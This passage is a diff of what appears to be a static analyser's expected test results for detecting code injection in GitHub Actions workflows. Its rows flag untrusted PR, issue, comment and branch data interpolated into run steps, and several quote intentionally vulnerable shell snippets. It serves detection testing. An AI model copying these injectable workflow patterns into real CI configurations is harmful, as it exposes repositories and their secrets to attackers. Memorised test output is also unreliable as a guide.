steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | .github/workflows/test.yml | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout1.yml | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches3.yml | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches5.yml | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues | +| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | 